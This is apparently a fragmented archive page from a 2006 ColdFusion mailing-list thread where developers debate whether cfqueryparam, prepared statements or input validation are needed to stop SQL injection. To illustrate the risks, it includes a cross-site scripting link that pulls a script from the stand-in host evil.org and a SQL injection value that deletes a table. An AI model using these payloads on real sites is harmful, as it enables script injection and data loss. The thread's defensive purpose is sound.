Objects stored in a repository is very much an Object Oriented DB concept.
CF doesn't really support this idea of storing an object. Most of this is
accomplished by storing data in a RDMS.
Centralizing where you update metadata for queries is very much like ORM
models. An example would be
Mark,
We all have time frames and I was just offering a suggestion that has saved
me time with other clients.
I wish you success on your endeavor.
Teddy
~|
Introducing the Fusion Authority Quarterly Update. 80 pages of
://www.reedexpo.com
-Original Message-
From: Dan Plesse
To: CF-Talk
Sent: Fri Aug 25 20:08:18 2006
Subject: Re: coldfusion sql injection
One of things I am thinking about doing today is running an outside process
(hsqldb web server started by CF using cfexecute) which contains all my
objects which
I think I am going to try an object repository using the (under used)
coldfusion JWS service.
I think I did this before but I have no idea why I dropped the idea it's so
simple to do.
JWS example
import org.hsqldb.WebServer;
import java.io.*;
public class MyWebserverObject extends WebServer
On 8/25/06, Robertson-Ravo, Neil (RX) [EMAIL PROTECTED]
wrote:
No the question was not ColdFusion, the question was why re-invent the
wheel
- just use cfquery and cfqueryparam.
Re-inventing the wheel is relative to what you're doing and the frame of
reference.
I can think of many reasons
So there's the question. Can someone provide an example of a
working sql injection attack?
Sure:
http://www.ngssoftware.com/papers/advanced_sql_injection.pdf
There's a whole section in there about multi-step SQL injection attacks
against systems that escape all single quotes. They are
I will pipe up here, and ask one question though. And the
reason I ask this is that it's maybe different for me, but I
tend not to use the cfqueryparam in cffunction's that have
cfarguments and are typed.
I find it is not required as the function will throw an error
anyway, and the
On 8/24/06, Dave Watts [EMAIL PROTECTED] wrote:
More evil is stuff like:
A HREF=http://trusted.org/search.cgi?criteria=SCRIPT
SRC='http://evil.org/badkama.js' ...
I don't know what you mean by more evil, but generally speaking SQL
injection attacks are considered to be a more serious
I have a good example of injection and XSS here...
http://mkruger.cfwebtools.com/index.cfm?mode=aliasalias=security.pyramid.co
de
-Original Message-
So there's the question. Can someone provide an example of a
working sql injection attack?
I will pipe up here, and ask one question though. And the reason I ask this
is that it's maybe different for me, but I tend not to use the cfqueryparam
in cffunction's that have cfarguments and are typed.
I find it is not required as the function will throw an error anyway, and
the only time
My example using PrepareStatements.
This makes a sql injection attack a thing of the past and its also faster.
PreparedStatement ps = con.PrepareStatement(INSERT INTO MYTABLE VALUES
(?,?,?,?););
ps.setInt(1, 3);
ps.setString(2, something);
ps.setString(3, and);
ps.setString(4, other);
://www.reedexpo.com
-Original Message-
From: Dan Plesse
To: CF-Talk
Sent: Fri Aug 25 17:47:24 2006
Subject: Re: coldfusion sql injection
My example using PrepareStatements.
This makes a sql injection attack a thing of the past and its also faster.
PreparedStatement ps = con.PrepareStatement
My example using PrepareStatements.
This makes a sql injection attack a thing of the past and
its also faster.
While you might have perfectly valid reasons for doing this, it is what
CFQUERYPARAM does for you, if you're using CFQUERY. If I wanted to write all
my database connection stuff in
. Doing it the
way described below ... I might as well use ASP :)
-Mark
-Original Message-
From: Dave Watts [mailto:[EMAIL PROTECTED]
Sent: Friday, August 25, 2006 12:08 PM
To: CF-Talk
Subject: RE: coldfusion sql injection
My example using PrepareStatements.
This makes a sql injection
If you spend that much time maintaining queries, perhaps you need to
organize the queries into an ORM model and alleviate some routine tasks.
Teddy
~|
Introducing the Fusion Authority Quarterly Update. 80 pages of hard-hitting,
. The opinions expressed within
this
communication are not necessarily those expressed by Reed Exhibitions.
Visit our website at http://www.reedexpo.com
-Original Message-
From: Dan Plesse
To: CF-Talk
Sent: Fri Aug 25 17:47:24 2006
Subject: Re: coldfusion sql injection
My example
One of things I am thinking about doing today is running an outside process
(hsqldb web server started by CF using cfexecute) which contains all my
objects which coldfusion uses like all my PrepareStatements and cfquery
objects. I wanted to use objects which were saved in a DB now this is my
More evil is stuff like:
A HREF=http://trusted.org/search.cgi?criteria=SCRIPT
SRC='http://evil.org/badkama.js'
http://evil.org/badkama.js%27/SCRIPT Go to trusted.org/A
OR
img src=http://trusted.org/account.asp?ak=script
document.location.replace
More evil is stuff like:
A HREF=http://trusted.org/search.cgi?criteria=SCRIPT
SRC='http://evil.org/badkama.js' ...
I don't know what you mean by more evil, but generally speaking SQL
injection attacks are considered to be a more serious problem than
cross-site scripting attacks. Fortunately,
This has been necessary for ages and I'm glad they finally added it
(not that I've used a DW code gen wizard for anything, apart from the
IE ActiveX activiation thing, in years).
On 8/25/06, Dave Watts [EMAIL PROTECTED] wrote:
Even the Dreamweaver 8 code-generation
wizards generate
I will pipe up here, and ask one question though. And the reason I ask this
is that it's maybe different for me, but I tend not to use the cfqueryparam
in cffunction's that have cfarguments and are typed.
I find it is not required as the function will throw an error anyway, and
the only time that
CFQUERYPARAM binds the argument into the statement, preventing it from
being interpreted as SQL.
On 8/25/06, Andrew Scott [EMAIL PROTECTED] wrote:
I will pipe up here, and ask one question though. And the reason I ask this
is that it's maybe different for me, but I tend not to use the
Russ wrote:
That's the thing... When is cfqueryparam REALLY necessary for security? I
want to see some examples that require cfqueryparam.
Always. For the simple reason that you are not able to prove that any other
solution is secure.
Jochem
Message-
From: Jochem van Dieten
To: CF-Talk
Sent: Wed Aug 23 09:10:26 2006
Subject: Re: coldfusion sql injection
Russ wrote:
That's the thing... When is cfqueryparam REALLY necessary for security? I
want to see some examples that require cfqueryparam.
Always. For the simple reason that you
Rick Root wrote:
Snake wrote:
Select * from table
Where x = #form.value#
And form.value = (delete from table)
cftry
cfparam name=form.value type=numeric
cfcatch type=anycfthrow .../cfcatch
/cftry
/cftry
or
cfif not isNumeric(form.value)
Cfthrow ...
/cfif
And that catches
Let alone the security aspect, it also improves performance by causing your
database server to bind the variables before executing the query.
Straight from Macromedia:
http://tinyurl.com/oo49m (link to docs)
- Allows the use of SQL bind parameters, which improves performance.
- Ensures that
The string is also autoescaped even if you don't use cfqueryparam... at
least on SQL server. Is it not with other DB systems?
-Original Message-
From: Jeff Guillaume [mailto:[EMAIL PROTECTED]
Sent: Wednesday, August 23, 2006 10:19 AM
To: CF-Talk
Subject: Re: coldfusion sql
The string is also autoescaped even if you don't use cfqueryparam... at
least on SQL server. Is it not with other DB systems?
Autoescape is done by CF, so it works for any DB.
--
___
REUSE CODE! Use custom tags;
See
Russ wrote:
The string is also autoescaped even if you don't use cfqueryparam... at
least on SQL server. Is it not with other DB systems?
It is. But that is not enough.
Jochem
~|
Introducing the Fusion Authority Quarterly
So there's the question. Can someone provide an example of a working sql
injection attack?
-Original Message-
From: Jochem van Dieten [mailto:[EMAIL PROTECTED]
Sent: Wednesday, August 23, 2006 2:05 PM
To: CF-Talk
Subject: Re: coldfusion sql injection
Russ wrote:
The string
I posted one earlier. Replace a numeric value that is sent via form or URL
with some SQL and the SQL will execute.
Snake
-Original Message-
From: Russ [mailto:[EMAIL PROTECTED]
Sent: 23 August 2006 19:16
To: CF-Talk
Subject: RE: coldfusion sql injection
So there's the question. Can
Russ wrote:
So there's the question. Can someone provide an example of a working sql
injection attack?
Plenty have been posted in this thread. Even more are in the archives. And if
that isn't enough, check the archives of the penetration-testing securityfocus
mailinglist.
Jochem
I precompile everything. No DSN needed and since cfquery is serializable I
make a unique backup copy of tables for fun.
Example application.cfm
cfif NOT isdefined(application.sqlserver_connection) OR
application.sqlserver_connection.isClosed() EQ YES
cfset application.insert_mailiglist =
I just make sure I always scrub user-entered data when possible, but at the
very least you should use cfqueryparam to pass data into queries.
---
Jeff Guillaume
Kazoomis
www.kazoomis.com
Now, it is my belief that CF auto escapes single quotes, so sql injection
into a string is not possible. I
That's the thing... When is cfqueryparam REALLY necessary for security? I
want to see some examples that require cfqueryparam.
Russ
-Original Message-
From: Jeff Guillaume [mailto:[EMAIL PROTECTED]
Sent: Tuesday, August 22, 2006 6:53 PM
To: CF-Talk
Subject: Re: coldfusion sql
Snake wrote:
Select * from table
Where x = #form.value#
And form.value = (delete from table)
cftry
cfparam name=form.value type=numeric
cfcatch type=anycfthrow .../cfcatch
/cftry
/cftry
or
cfif not isNumeric(form.value)
Cfthrow ...
/cfif
cfqueryparam is *NEVER* required if you're
a reason that we NEED to use cfqueryparam for security.
Russ
-Original Message-
From: Snake [mailto:[EMAIL PROTECTED]
Sent: Tuesday, August 22, 2006 8:13 PM
To: CF-Talk
Subject: RE: coldfusion sql injection
Select * from table
Where x = #form.value#
And form.value = (delete
Well, we don't NEED to use CF to write web apps either, but it makes
my job a lot easier.
On 8/23/06, Russ [EMAIL PROTECTED] wrote:
Where x is numeric... which can be fixed by using a lot of other things
other then cfqueryparam, such as
Select * from table
Where x = #Val(form.value)#
Or
38 matches
Mail list logo